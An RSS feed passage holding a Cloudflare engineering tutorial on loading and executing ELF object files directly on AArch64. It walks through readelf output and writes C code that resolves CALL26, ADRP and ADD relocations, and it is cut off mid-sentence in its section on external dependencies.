    <p>Cloudflare has been able to leverage OpenBMC to gain more control and flexibility over our server configurations, without sacrificing the efficiency at the core of our network. While we continue to work closely with our ODM partners, our ongoing GPU deployment has underscored the importance of being able to modify server firmware without being locked into traditional device update cycles. For those who are interested in making the jump to open-source firmware, check out OpenBMC <a href="https://github.com/openbmc/openbmc">here</a>!</p>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Workers AI]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <guid isPermaLink="false">2M0H6i0QI1A4pXsAM6PrWI</guid>
            <dc:creator>Ryan Chow</dc:creator>
            <dc:creator>Giovanni Pereira Zantedeschi</dc:creator>
            <dc:creator>Nnamdi Ajah</dc:creator>
        </item>
        <item>
            <title><![CDATA[How to execute an object file: part 4, AArch64 edition]]></title>
            <link>https://blog.cloudflare.com/how-to-execute-an-object-file-part-4/</link>
            <pubDate>Fri, 17 Nov 2023 14:00:35 GMT</pubDate>
            <description><![CDATA[ The initial posts are dedicated to the x86 architecture. Since then, the fleet of our working machines has expanded to include a large and growing number of ARM CPUs. This time we’ll repeat this exercise for the aarch64 architecture. ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5Ih4pvbZshdUy2ihfodYAU/7800842ad2c0270609b36a8a99d0ceb4/image1-1.png" />
            
            </figure><p>Translating source code written in a high-level programming language into an executable binary typically involves a series of steps, namely compiling and assembling the code into object files, and then linking those object files into the final executable. However, there are certain scenarios where it can be useful to apply an alternate approach that involves executing object files directly, bypassing the linker. For example, we might use it for malware analysis, or when part of the code requires an incompatible compiler. We’ll be focusing on the latter scenario: when one of our libraries needed to be compiled differently from the rest of the code. Learning how to execute an object file directly will give you a much better sense of how code is compiled and linked together.</p><p>To demonstrate how this was done, we have previously published a series of posts on executing an object file:</p><ul><li><p><a href="/how-to-execute-an-object-file-part-1/">How to execute an object file: Part 1</a></p></li><li><p><a href="/how-to-execute-an-object-file-part-2/">How to execute an object file: Part 2</a></p></li><li><p><a href="/how-to-execute-an-object-file-part-3/">How to execute an object file: Part 3</a></p></li></ul><p>The initial posts are dedicated to the x86 architecture. Since then, the fleet of our working machines has expanded to include a large and growing number of ARM CPUs. This time we’ll repeat this exercise for the aarch64 architecture. You can pause here to read the previous blog posts before proceeding with this one, or read through the brief summary below and reference the earlier posts for more detail. We will reiterate some theory, as working with ELF files can be daunting if it is not your day-to-day routine. Also, please be mindful that for simplicity, these examples omit bounds and integrity checks. Let the journey begin!</p>
    <div>
      <h2>Introduction</h2>
      <a href="#introduction">
        
      </a>
    </div>
    <p>In order to obtain an object file or an executable binary from a high-level compiled programming language, the code needs to be processed by three components: the compiler, the assembler, and the linker. The compiler generates an assembly listing. This assembly listing is picked up by the assembler and translated into an object file. If a program contains multiple source files, each one goes through these two steps, generating one object file per source file. At the final step, the linker unites all the object files into one binary, additionally resolving references to shared libraries (e.g. we don’t implement the <code>printf</code> function each time; rather, we take it from a system library). Even though the approach is platform independent, the compiler output varies by platform, as the assembly listing is closely tied to the CPU architecture.</p><p>GCC (GNU Compiler Collection) can run each step (compiler, assembler, and linker) separately for us:</p><p>main.c:</p>
            <pre><code>#include &lt;stdio.h&gt;

int main(void)
{
	puts("Hello, world!");
	return 0;
}</code></pre>
            <p>Compiler (output <code>main.s</code> - assembly listing):</p>
            <pre><code>$ gcc -S main.c
$ ls
main.c  main.s</code></pre>
            <p>Assembler (output <code>main.o</code> - an object file):</p>
            <pre><code>$ gcc -c main.s -o main.o
$ ls
main.c  main.o  main.s</code></pre>
            <p>Linker (output <code>main</code> - an executable binary):</p>
            <pre><code>$ gcc main.o -o main
$ ls
main  main.c  main.o  main.s
$ ./main
Hello, world!</code></pre>
            <p>All the examples assume gcc is running on a native aarch64 architecture, or include a cross compilation flag for those who want to reproduce them without aarch64 hardware.</p><p>We have two object files in the output above: <code>main.o</code> and <code>main</code>. Object files are files encoded with the <a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format">ELF (Executable and Linkable Format)</a> standard. Although <code>main.o</code> is an ELF file, it doesn’t contain all the information needed to be fully executable.</p>
            <pre><code>$ file main.o
main.o: ELF 64-bit LSB relocatable, ARM aarch64, version 1 (SYSV), not stripped

$ file main
main: ELF 64-bit LSB pie executable, ARM aarch64, version 1 (SYSV), dynamically
linked, interpreter /lib/ld-linux-aarch64.so.1,
BuildID[sha1]=d3ecd2f8ac3b2dec11ed4cc424f15b3e1f130dd4, for GNU/Linux 3.7.0, not stripped</code></pre>
            
    <div>
      <h2>The ELF File</h2>
      <a href="#the-elf-file">
        
      </a>
    </div>
    <p>The central idea of this series of blog posts is to understand how to resolve dependencies from object files without directly involving the linker. For illustrative purposes we generated an object file based on some C-code and used it as a library for our main program. Before switching to the code, we need to understand the basics of the ELF structure.</p><p>Each ELF file is made up of one <i>ELF header</i>, followed by file data. The data can include: a <i>program header</i> table, a <i>section header</i> table, and the data which is referred to by the program or section header tables.</p>
    <div>
      <h3>The ELF Header</h3>
      <a href="#the-elf-header">
        
      </a>
    </div>
    <p>The ELF header provides some basic information about the file: what architecture the file is compiled for, the program entry point and the references to other tables.</p><p>The ELF Header:</p>
            <pre><code>$ readelf -h main
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 
  Class:                             ELF64
  Data:                              2's complement, little endian
  Version:                           1 (current)
  OS/ABI:                            UNIX - System V
  ABI Version:                       0
  Type:                              DYN (Position-Independent Executable file)
  Machine:                           AArch64
  Version:                           0x1
  Entry point address:               0x640
  Start of program headers:          64 (bytes into file)
  Start of section headers:          68576 (bytes into file)
  Flags:                             0x0
  Size of this header:               64 (bytes)
  Size of program headers:           56 (bytes)
  Number of program headers:         9
  Size of section headers:           64 (bytes)
  Number of section headers:         29
  Section header string table index: 28</code></pre>
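            <p>The fields readelf prints live at fixed offsets in the file, so they can be read directly. As a small sketch (ELF64, little-endian layout only; field offsets per the ELF specification, and the helper name is ours):</p>

```python
import struct

def read_elf_header(path):
    """Parse a few ELF64 (little-endian) header fields, as shown by readelf -h."""
    with open(path, "rb") as f:
        ident = f.read(16)
        # e_ident: magic bytes, then EI_CLASS == 2 for ELF64
        assert ident[:4] == b"\x7fELF" and ident[4] == 2
        e_type, e_machine, e_version, e_entry, e_phoff, e_shoff = struct.unpack(
            "<HHIQQQ", f.read(32))
    return {"type": e_type,        # 3 == ET_DYN (position-independent executable)
            "machine": e_machine,  # 183 == EM_AARCH64
            "entry": e_entry,
            "phoff": e_phoff,
            "shoff": e_shoff}
```

            <p>Run against the <code>main</code> binary above, this would report machine 183 (AArch64) and entry point 0x640, matching the readelf output.</p>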
            
    <div>
      <h3>The ELF Program Header</h3>
      <a href="#the-elf-program-header">
        
      </a>
    </div>
    <p>The execution of almost every program starts with an auxiliary program, called the loader, which arranges the memory and calls the program’s entry point. In the following output, the loader is identified by the line <code>“Requesting program interpreter: /lib/ld-linux-aarch64.so.1”</code>. The whole program memory is split into different segments, each with an associated size, permissions, and type (which instructs the loader on how to interpret that block of memory). Because loading should be performed in the shortest possible time, nearby <i>sections</i> with the same characteristics are grouped into bigger blocks, called <i>segments</i>, and placed in the <i>program header</i>. We can say that the <i>program header</i> summarizes the types of data that appear in the <i>section header</i>.</p><p>The ELF Program Header:</p>
            <pre><code>$ readelf -Wl main

Elf file type is DYN (Position-Independent Executable file)
Entry point 0x640
There are 9 program headers, starting at offset 64

Program Headers:
  Type           Offset   VirtAddr           PhysAddr           FileSiz  MemSiz   Flg Align
  PHDR           0x000040 0x0000000000000040 0x0000000000000040 0x0001f8 0x0001f8 R   0x8
  INTERP         0x000238 0x0000000000000238 0x0000000000000238 0x00001b 0x00001b R   0x1
      [Requesting program interpreter: /lib/ld-linux-aarch64.so.1]
  LOAD           0x000000 0x0000000000000000 0x0000000000000000 0x00088c 0x00088c R E 0x10000
  LOAD           0x00fdc8 0x000000000001fdc8 0x000000000001fdc8 0x000270 0x000278 RW  0x10000
  DYNAMIC        0x00fdd8 0x000000000001fdd8 0x000000000001fdd8 0x0001e0 0x0001e0 RW  0x8
  NOTE           0x000254 0x0000000000000254 0x0000000000000254 0x000044 0x000044 R   0x4
  GNU_EH_FRAME   0x0007a0 0x00000000000007a0 0x00000000000007a0 0x00003c 0x00003c R   0x4
  GNU_STACK      0x000000 0x0000000000000000 0x0000000000000000 0x000000 0x000000 RW  0x10
  GNU_RELRO      0x00fdc8 0x000000000001fdc8 0x000000000001fdc8 0x000238 0x000238 R   0x1

 Section to Segment mapping:
  Segment Sections...
   00     
   01     .interp 
   02     .interp .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame 
   03     .init_array .fini_array .dynamic .got .got.plt .data .bss 
   04     .dynamic 
   05     .note.gnu.build-id .note.ABI-tag 
   06     .eh_frame_hdr 
   07     
   08     .init_array .fini_array .dynamic .got </code></pre>
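            <p>The loader finds this table through the ELF header: e_phoff gives its file offset, e_phentsize the entry size, and e_phnum the number of entries. A minimal sketch of walking it (ELF64, little-endian; field offsets per the ELF specification; illustrative only, with no bounds checks):</p>

```python
import struct

PT_LOAD, PT_DYNAMIC, PT_INTERP = 1, 2, 3  # a few common segment types

def program_headers(path):
    """Yield (p_type, p_flags, p_offset, p_vaddr) for each program header entry."""
    with open(path, "rb") as f:
        data = f.read()
    e_phoff, = struct.unpack_from("<Q", data, 32)               # e_phoff at offset 32
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)  # entry size and count
    for i in range(e_phnum):
        # first four fields of an ELF64 program header
        yield struct.unpack_from("<IIQQ", data, e_phoff + i * e_phentsize)
```

            <p>For the <code>main</code> binary above, this would yield nine entries, including the PT_INTERP segment and the two PT_LOAD segments shown by readelf.</p>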
            
    <div>
      <h3>The ELF Section Header</h3>
      <a href="#the-elf-section-header">
        
      </a>
    </div>
    <p>In the source code of high-level languages, variables, functions, and constants are mixed together. However, in assembly you might see that the data and instructions are separated into different blocks. The ELF file content is divided in an even more granular way. For example, variables with initial values are placed into different sections than uninitialized ones. This approach saves space: otherwise, the file would have to store zero-filled data for every uninitialized variable. Along with space efficiency, there are security reasons for this stratification: executable instructions can’t have writable permissions, while memory containing variables can’t be executable. The section header describes each of these sections.</p><p>The ELF Section Header:</p>
            <pre><code>$ readelf -SW main
There are 29 section headers, starting at offset 0x10be0:

Section Headers:
  [Nr] Name              Type            Address          Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            0000000000000000 000000 000000 00      0   0  0
  [ 1] .interp           PROGBITS        0000000000000238 000238 00001b 00   A  0   0  1
  [ 2] .note.gnu.build-id NOTE            0000000000000254 000254 000024 00   A  0   0  4
  [ 3] .note.ABI-tag     NOTE            0000000000000278 000278 000020 00   A  0   0  4
  [ 4] .gnu.hash         GNU_HASH        0000000000000298 000298 00001c 00   A  5   0  8
  [ 5] .dynsym           DYNSYM          00000000000002b8 0002b8 0000f0 18   A  6   3  8
  [ 6] .dynstr           STRTAB          00000000000003a8 0003a8 000092 00   A  0   0  1
  [ 7] .gnu.version      VERSYM          000000000000043a 00043a 000014 02   A  5   0  2
  [ 8] .gnu.version_r    VERNEED         0000000000000450 000450 000030 00   A  6   1  8
  [ 9] .rela.dyn         RELA            0000000000000480 000480 0000c0 18   A  5   0  8
  [10] .rela.plt         RELA            0000000000000540 000540 000078 18  AI  5  22  8
  [11] .init             PROGBITS        00000000000005b8 0005b8 000018 00  AX  0   0  4
  [12] .plt              PROGBITS        00000000000005d0 0005d0 000070 00  AX  0   0 16
  [13] .text             PROGBITS        0000000000000640 000640 000134 00  AX  0   0 64
  [14] .fini             PROGBITS        0000000000000774 000774 000014 00  AX  0   0  4
  [15] .rodata           PROGBITS        0000000000000788 000788 000016 00   A  0   0  8
  [16] .eh_frame_hdr     PROGBITS        00000000000007a0 0007a0 00003c 00   A  0   0  4
  [17] .eh_frame         PROGBITS        00000000000007e0 0007e0 0000ac 00   A  0   0  8
  [18] .init_array       INIT_ARRAY      000000000001fdc8 00fdc8 000008 08  WA  0   0  8
  [19] .fini_array       FINI_ARRAY      000000000001fdd0 00fdd0 000008 08  WA  0   0  8
  [20] .dynamic          DYNAMIC         000000000001fdd8 00fdd8 0001e0 10  WA  6   0  8
  [21] .got              PROGBITS        000000000001ffb8 00ffb8 000030 08  WA  0   0  8
  [22] .got.plt          PROGBITS        000000000001ffe8 00ffe8 000040 08  WA  0   0  8
  [23] .data             PROGBITS        0000000000020028 010028 000010 00  WA  0   0  8
  [24] .bss              NOBITS          0000000000020038 010038 000008 00  WA  0   0  1
  [25] .comment          PROGBITS        0000000000000000 010038 00001f 01  MS  0   0  1
  [26] .symtab           SYMTAB          0000000000000000 010058 000858 18     27  66  8
  [27] .strtab           STRTAB          0000000000000000 0108b0 00022c 00      0   0  1
  [28] .shstrtab         STRTAB          0000000000000000 010adc 000103 00      0   0  1
Key to Flags:
  W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
  L (link order), O (extra OS processing required), G (group), T (TLS),
  C (compressed), x (unknown), o (OS specific), E (exclude),
  D (mbind), p (processor specific)</code></pre>
            
    <div>
      <h2>Executing example from Part 1 on aarch64</h2>
      <a href="#executing-example-from-part-1-on-aarch64">
        
      </a>
    </div>
    <p>Actually, our <a href="https://github.com/cloudflare/cloudflare-blog/tree/master/2021-03-obj-file/1">initial code</a> from <a href="/how-to-execute-an-object-file-part-1/">Part 1</a> works on aarch64 as is!</p><p>Let’s quickly summarize what the code does:</p><ol><li><p>Find the code of the two functions (<code>add5</code> and <code>add10</code>) in the <code>.text</code> section of our object file (<code>obj.o</code>)</p></li><li><p>Load the functions into executable memory</p></li><li><p>Return the memory locations of the functions to the main program</p></li></ol><p>There is one nuance: even though all the sections appear in the section header, none of them carries a string name directly. Without the names we can’t identify them. However, a fixed-size character field for each section in the ELF structure would be space-inefficient — it would have to allow for some maximum length, and shorter names would leave most of it unused. Instead, ELF provides an additional section, <code>.shstrtab</code>. This string table concatenates all the names, each terminated by a null byte. Every section header stores an offset into this table to reference its name. But how do we find <code>.shstrtab</code> itself if we don’t have a name for it? To solve this chicken-and-egg problem, the ELF file header stores the index of <code>.shstrtab</code> (the <code>e_shstrndx</code> field). A similar approach is applied to two other sections: <code>.symtab</code>, which contains all information about the symbols, and <code>.strtab</code>, which holds the symbol names. In the code we work with these tables to resolve all the dependencies and find our functions.</p>
    <div>
      <h2>Executing example from Part 2 on aarch64</h2>
      <a href="#executing-example-from-part-2-on-aarch64">
        
      </a>
    </div>
    <p>At the beginning of the second blog post on <a href="/how-to-execute-an-object-file-part-2/">how to execute an object file</a> we made the function <code>add10</code> depend on <code>add5</code> instead of being self-contained. This was the first time we faced relocations. <i>Relocation</i> is the process of resolving references to symbols defined outside the current scope. The relocated symbols can represent global or thread-local variables, constants, functions, etc. We’ll start by checking the assembly instructions that trigger relocations and uncover how the ELF format handles them more generally.</p><p>After making <code>add10</code> depend on <code>add5</code>, our aarch64 version stopped working too, just like the x86 one. Let’s take a look at the assembly listing:</p>
            <pre><code>$ objdump --disassemble --section=.text obj.o

obj.o:     file format elf64-littleaarch64


Disassembly of section .text:

0000000000000000 &lt;add5&gt;:
   0:	d10043ff 	sub	sp, sp, #0x10
   4:	b9000fe0 	str	w0, [sp, #12]
   8:	b9400fe0 	ldr	w0, [sp, #12]
   c:	11001400 	add	w0, w0, #0x5
  10:	910043ff 	add	sp, sp, #0x10
  14:	d65f03c0 	ret

0000000000000018 &lt;add10&gt;:
  18:	a9be7bfd 	stp	x29, x30, [sp, #-32]!
  1c:	910003fd 	mov	x29, sp
  20:	b9001fe0 	str	w0, [sp, #28]
  24:	b9401fe0 	ldr	w0, [sp, #28]
  28:	94000000 	bl	0 &lt;add5&gt;
  2c:	b9001fe0 	str	w0, [sp, #28]
  30:	b9401fe0 	ldr	w0, [sp, #28]
  34:	94000000 	bl	0 &lt;add5&gt;
  38:	a8c27bfd 	ldp	x29, x30, [sp], #32
  3c:	d65f03c0 	ret</code></pre>
            <p>Have you noticed that all the hex values in the second column are exactly the same length, in contrast with the variable instruction lengths seen for x86 in Part 2 of our series? This is because all Armv8-A instructions are encoded in 32 bits. Since it is impossible to encode every immediate value into less than 32 bits, some operations require more than one instruction, as we’ll see later. For now, we’re interested in one instruction: <code>bl</code> (<a href="https://developer.arm.com/documentation/ddi0596/2021-12/Base-Instructions/BL--Branch-with-Link-?lang=en">branch with link</a>) on rows <code>28</code> and <code>34</code>. The <code>bl</code> is a “jump” instruction, but before the jump it preserves the address of the next instruction in the link register (<code>lr</code>). When the callee finishes execution, the caller address is recovered from <code>lr</code>. Usually, aarch64 instructions reserve the top 6 bits [31:26] for the opcode and some auxiliary fields such as the running architecture (32 or 64 bits), condition flags and others. The remaining bits are shared between arguments like the source register, destination register and immediate value. Since the <code>bl</code> instruction does not require a source or destination register, the full 26 bits can be used to encode the immediate offset instead. However, 26 bits can only encode a small range (+/-32 MB); but because the jump can only target the beginning of an instruction, it must always be aligned to 4 bytes, which increases the effective range of the encoded immediate fourfold, to +/-128 MB.</p><p>Similarly to what we did in <a href="/how-to-execute-an-object-file-part-2/">Part 2</a>, we’re going to resolve our relocations: first by manually calculating the correct addresses, and then by using an approach similar to what the linker does. The current value of our <code>bl</code> instruction is <code>94000000</code>, or in binary representation <code>10010100000000000000000000000000</code>. All 26 immediate bits are zeros, so we don’t jump anywhere. The address is calculated as an offset from the current <i>program counter</i> (<code>pc</code>), which can be positive or negative. In our case we expect it to be <code>-0x28</code> and <code>-0x34</code>. As described above, each offset should be divided by 4 and taken as <a href="https://en.wikipedia.org/wiki/Two%27s_complement">two's complement</a>: <code>-0x28 / 4 = -0xA == 0xFFFFFFF6</code> and <code>-0x34 / 4 = -0xD == 0xFFFFFFF3</code>. From these values we take the lower 26 bits and concatenate them with the initial 6 opcode bits to get the final instructions: <code>10010111111111111111111111110110 == 0x97FFFFF6</code> and <code>10010111111111111111111111110011 == 0x97FFFFF3</code>. Have you noticed that all the distance calculations are done relative to the <code>bl</code> itself (the current <code>pc</code>), not the next instruction as in x86?</p><p>Let’s add to the code and execute:</p>
            <pre><code>... 

static void parse_obj(void)
{
	...
	/* copy the contents of `.text` section from the ELF file */
	memcpy(text_runtime_base, obj.base + text_hdr-&gt;sh_offset, text_hdr-&gt;sh_size);

	*((uint32_t *)(text_runtime_base + 0x28)) = 0x97FFFFF6;
	*((uint32_t *)(text_runtime_base + 0x34)) = 0x97FFFFF3;

	/* make the `.text` copy readonly and executable */
	if (mprotect(text_runtime_base, page_align(text_hdr-&gt;sh_size), PROT_READ | PROT_EXEC)) {
	...</code></pre>
            <p>Compile and run:</p>
            <pre><code>$ gcc -o loader loader.c
$ ./loader
Executing add5...
add5(42) = 47
Executing add10...
add10(42) = 52</code></pre>
            <p>It works! But this is not how the linker handles the relocations. The linker resolves relocation based on the type and formula assigned to this type. In our <a href="/how-to-execute-an-object-file-part-2/">Part 2</a> we investigated it quite well. Here again we need to find the type and check the formula for this type:</p>
            <pre><code>$ readelf --relocs obj.o

Relocation section '.rela.text' at offset 0x228 contains 2 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
000000000028  000a0000011b R_AARCH64_CALL26  0000000000000000 add5 + 0
000000000034  000a0000011b R_AARCH64_CALL26  0000000000000000 add5 + 0

Relocation section '.rela.eh_frame' at offset 0x258 contains 2 entries:
  Offset          Info           Type           Sym. Value    Sym. Name + Addend
00000000001c  000200000105 R_AARCH64_PREL32  0000000000000000 .text + 0
000000000034  000200000105 R_AARCH64_PREL32  0000000000000000 .text + 18</code></pre>
            <p>Our Type is R_AARCH64_CALL26 and the <a href="https://github.com/ARM-software/abi-aa/blob/main/aaelf64/aaelf64.rst#5733relocation-operations">formula</a> for it is:</p><table>
	<tbody>
		<tr>
			<td>
			<p><span><span><span><b>ELF64 Code</b></span></span></span></p>
			</td>
			<td>
			<p><span><span><span><b>Name</b></span></span></span></p>
			</td>
			<td>
			<p><span><span><span><b>Operation</b></span></span></span></p>
			</td>
		</tr>
		<tr>
			<td>
			<p><span><span><span>283</span></span></span></p>
			</td>
			<td>
			<p><span><span><span>R_&lt;CLS&gt;_CALL26</span></span></span></p>
			</td>
			<td>
			<p><span><span><span>S + A - P</span></span></span></p>
			</td>
		</tr>
	</tbody>
</table><p>where:</p><ul><li><p><code>S</code> (when used on its own) is the address of the symbol</p></li><li><p><code>A</code> is the addend for the relocation</p></li><li><p><code>P</code> is the address of the place being relocated (derived from <code>r_offset</code>)</p></li></ul><p>Here are the relevant changes to loader.c:</p>
            <pre><code>/* Replace `#define R_X86_64_PLT32 4` with our Type */
#define R_AARCH64_CALL26 283
...

static void do_text_relocations(void)
{
	...
	uint32_t val;

	switch (type)
	{
	case R_AARCH64_CALL26: {
		/* The mask separates the opcode (upper 6 bits) from the 26-bit immediate */
		uint32_t mask_bl = (0xffffffff &lt;&lt; 26);
		/* S+A-P, divided by 4 */
		val = (symbol_address + relocations[i].r_addend - patch_offset) &gt;&gt; 2;
		/* Keep the opcode bits and insert the immediate to get the final instruction */
		*((uint32_t *)patch_offset) &amp;= mask_bl;
		val &amp;= ~mask_bl;
		*((uint32_t *)patch_offset) |= val;
		break;
	}
	}
	...
}</code></pre>
            <p>Compile and run:</p>
            <pre><code>$ gcc -o loader loader.c 
$ ./loader
Calculated relocation: 0x97fffff6
Calculated relocation: 0x97fffff3
Executing add5...
add5(42) = 47
Executing add10...
add10(42) = 52</code></pre>
            <p>So far so good. The next challenge is to <a href="https://github.com/cloudflare/cloudflare-blog/blob/master/2021-03-obj-file/2/obj.c#L16-L31">add constant data and global variables</a> to our object file and check relocations again:</p>
            <pre><code>$ readelf --relocs --wide obj.o

Relocation section '.rela.text' at offset 0x388 contains 8 entries:
    Offset             Info             Type               Symbol's Value  Symbol's Name + Addend
0000000000000000  0000000500000113 R_AARCH64_ADR_PREL_PG_HI21 0000000000000000 .rodata + 0
0000000000000004  0000000500000115 R_AARCH64_ADD_ABS_LO12_NC 0000000000000000 .rodata + 0
000000000000000c  0000000300000113 R_AARCH64_ADR_PREL_PG_HI21 0000000000000000 .data + 0
0000000000000010  0000000300000115 R_AARCH64_ADD_ABS_LO12_NC 0000000000000000 .data + 0
0000000000000024  0000000300000113 R_AARCH64_ADR_PREL_PG_HI21 0000000000000000 .data + 0
0000000000000028  0000000300000115 R_AARCH64_ADD_ABS_LO12_NC 0000000000000000 .data + 0
0000000000000068  000000110000011b R_AARCH64_CALL26       0000000000000040 add5 + 0
0000000000000074  000000110000011b R_AARCH64_CALL26       0000000000000040 add5 + 0
...</code></pre>
            <p>This time we have two new relocation types: <code>R_AARCH64_ADD_ABS_LO12_NC</code> and <code>R_AARCH64_ADR_PREL_PG_HI21</code>. Their formulas are:</p><table>
	<tbody>
		<tr>
			<td>
			<p><span><span><span><b>ELF64 Code</b></span></span></span></p>
			</td>
			<td>
			<p><span><span><span><b>Name</b></span></span></span></p>
			</td>
			<td>
			<p><span><span><span><b>Operation</b></span></span></span></p>
			</td>
		</tr>
		<tr>
			<td>
			<p><span><span><span><span>275</span></span></span></span></p>
			</td>
			<td>
			<p><span><span><span><span>R_&lt;CLS&gt;_ ADR_PREL_PG_HI21</span></span></span></span></p>
			</td>
			<td>
			<p><span><span><span><span>Page(S+A) - Page(P)</span></span></span></span></p>
			</td>
		</tr>
		<tr>
			<td>
			<p><span><span><span>277</span></span></span></p>
			</td>
			<td>
			<p><span><span><span>R_&lt;CLS&gt;_ ADD_ABS_LO12_NC</span></span></span></p>
			</td>
			<td>
			<p><span><span><span>S + A</span></span></span></p>
			</td>
		</tr>
	</tbody>
</table><p>where:</p><p><code>Page(expr)</code> is the page address of the expression expr, defined as <code>(expr &amp; ~0xFFF)</code>. (This applies even if the machine page size supported by the platform has a different value.)</p><p>It’s a bit unclear why we have two new types, while in x86 we had only one. Let’s investigate the assembly code:</p>
            <pre><code>$ objdump --disassemble --section=.text obj.o

obj.o:     file format elf64-littleaarch64


Disassembly of section .text:

0000000000000000 &lt;get_hello&gt;:
   0:	90000000 	adrp	x0, 0 &lt;get_hello&gt;
   4:	91000000 	add	x0, x0, #0x0
   8:	d65f03c0 	ret

000000000000000c &lt;get_var&gt;:
   c:	90000000 	adrp	x0, 0 &lt;get_hello&gt;
  10:	91000000 	add	x0, x0, #0x0
  14:	b9400000 	ldr	w0, [x0]
  18:	d65f03c0 	ret

000000000000001c &lt;set_var&gt;:
  1c:	d10043ff 	sub	sp, sp, #0x10
  20:	b9000fe0 	str	w0, [sp, #12]
  24:	90000000 	adrp	x0, 0 &lt;get_hello&gt;
  28:	91000000 	add	x0, x0, #0x0
  2c:	b9400fe1 	ldr	w1, [sp, #12]
  30:	b9000001 	str	w1, [x0]
  34:	d503201f 	nop
  38:	910043ff 	add	sp, sp, #0x10
  3c:	d65f03c0 	ret</code></pre>
            <p>We see that all <code>adrp</code> instructions are followed by <code>add</code> instructions. The <a href="https://developer.arm.com/documentation/ddi0596/2021-12/Base-Instructions/ADD--immediate---Add--immediate--?lang=en"><code>add</code></a> instruction adds an immediate value to the source register and writes the result to the destination register. The source and destination registers can be the same, and the immediate value is 12 bits. The <a href="https://developer.arm.com/documentation/ddi0596/2021-12/Base-Instructions/ADRP--Form-PC-relative-address-to-4KB-page-?lang=en"><code>adrp</code></a> instruction generates a <code>pc</code>-relative (program counter) address and writes the result to the destination register. It takes the <code>pc</code> of the instruction itself and adds a 21-bit immediate value shifted left by 12 bits. If the immediate value weren’t shifted, it would cover a range of only +/-1 MB of memory, which isn’t enough. The left shift increases the range to +/-1 GB. However, because the low 12 bits are masked out by the shift, we need to store them somewhere and restore them later. That’s why we see an <code>add</code> instruction following each <code>adrp</code>, and two relocation types instead of one. Also, it’s a bit tricky to encode <a href="https://developer.arm.com/documentation/ddi0596/2021-12/Base-Instructions/ADRP--Form-PC-relative-address-to-4KB-page-?lang=en"><code>adrp</code></a>: the 2 low bits of the immediate value are placed at bits [30:29] and the rest at bits [23:5]. Due to size limitations, the aarch64 instructions try to make the most out of 32 bits.</p><p>In the code we are going to use the formulas to calculate the values, and the descriptions of the <code>adrp</code> and <code>add</code> instructions to obtain the final opcodes:</p>
            <pre><code>#define R_AARCH64_CALL26 283
#define R_AARCH64_ADD_ABS_LO12_NC 277
#define R_AARCH64_ADR_PREL_PG_HI21 275
...

{
case R_AARCH64_CALL26: {
	/* The mask separates the opcode (upper 6 bits) from the 26-bit immediate */
	uint32_t mask_bl = (0xffffffff &lt;&lt; 26);
	/* S+A-P, divided by 4 */
	val = (symbol_address + relocations[i].r_addend - patch_offset) &gt;&gt; 2;
	/* Keep the opcode bits and insert the immediate to get the final instruction */
	*((uint32_t *)patch_offset) &amp;= mask_bl;
	val &amp;= ~mask_bl;
	*((uint32_t *)patch_offset) |= val;
	break;
}
case R_AARCH64_ADD_ABS_LO12_NC: {
	/* The mask of the `add` instruction preserves the opcode and registers
	 * and clears the 12-bit immediate field at bits [21:10]
	 */
	uint32_t mask_add = 0b11111111110000000000001111111111;
	/* S + A: shift the low 12 bits of the symbol address
	 * into the immediate field at bits [21:10]
	 */
	val = ((uint64_t)(symbol_address + relocations[i].r_addend)) &lt;&lt; 10;
	val &amp;= ~mask_add;
	*((uint32_t *)patch_offset) &amp;= mask_add;
	/* Final instruction */
	*((uint32_t *)patch_offset) |= val;
	break;
}
case R_AARCH64_ADR_PREL_PG_HI21: {
	/* Page(S+A)-Page(P), Page(expr) is defined as (expr &amp; ~0xFFF) */
	int64_t page_delta = (((uint64_t)(symbol_address + relocations[i].r_addend)) &amp; ~0xFFF) - (((uint64_t)patch_offset) &amp; ~0xFFF);
	/* Shift the calculated value right by 12 bits: during decoding it
	 * will be shifted left as described above, so we do the opposite.
	 * Only the low 21 bits fit into the instruction.
	 */
	val = (page_delta &gt;&gt; 12) &amp; 0x1FFFFF;
	/* Split the 21-bit value: the 2 low bits go to [30:29],
	 * the remaining 19 bits go to [23:5]
	 */
	uint32_t immlo = (val &amp; 0x3) &lt;&lt; 29;
	uint32_t immhi = ((val &gt;&gt; 2) &amp; 0x7ffff) &lt;&lt; 5;
	*((uint32_t *)patch_offset) |= immlo;
	*((uint32_t *)patch_offset) |= immhi;
	break;
}
}</code></pre>
            <p>Compile and run:</p>
            <pre><code>$ gcc -o loader loader.c 
$ ./loader
Executing add5...
add5(42) = 47
Executing add10...
add10(42) = 52
Executing get_hello...
get_hello() = Hello, world!
Executing get_var...
get_var() = 5
Executing set_var(42)...
Executing get_var again...
get_var() = 42</code></pre>
            <p>It works! The final code is <a href="https://github.com/cloudflare/cloudflare-blog/tree/master/2021-03-obj-file/4/2">here</a>.</p>
    <div>
      <h2>Executing example from Part 3 on aarch64</h2>
      <a href="#executing-example-from-part-3-on-aarch64">
        
      </a>
    </div>
    <p>Our <a href="/how-to-execute-an-object-file-part-3/">Part 3</a> is about resolving external dependencies. When we write code we don’t think much about how to allocate memory or print debug information to the console. Instead, we call functions from the system libraries. But the code of the system libraries needs to be made available to our programs somehow. Additionally, for optimization purposes, it would be nice if this code were stored in one place and shared between all programs. And one more wish: we don’t want to resolve all the functions and global variables from the libraries, only those which we need, at the time we need them. To solve these problems, ELF introduced two sections: the PLT (procedure linkage table) and the GOT (global offset table). The dynamic loader creates a list of all external functions and variables from the shared library, but doesn’t resolve them immediately; instead, they are placed in the PLT section. Each external symbol is represented by a small function, a stub, e.g. <code>puts@plt</code>. When an external symbol is requested, the stub checks whether it was resolved previously. If not, the stub looks up the absolute address of the symbol, writes it into the GOT table, and returns it to the requester. The next time, the address comes directly from the GOT table.</p><p>In <a href="/how-to-execute-an-object-file-part-3/">Part 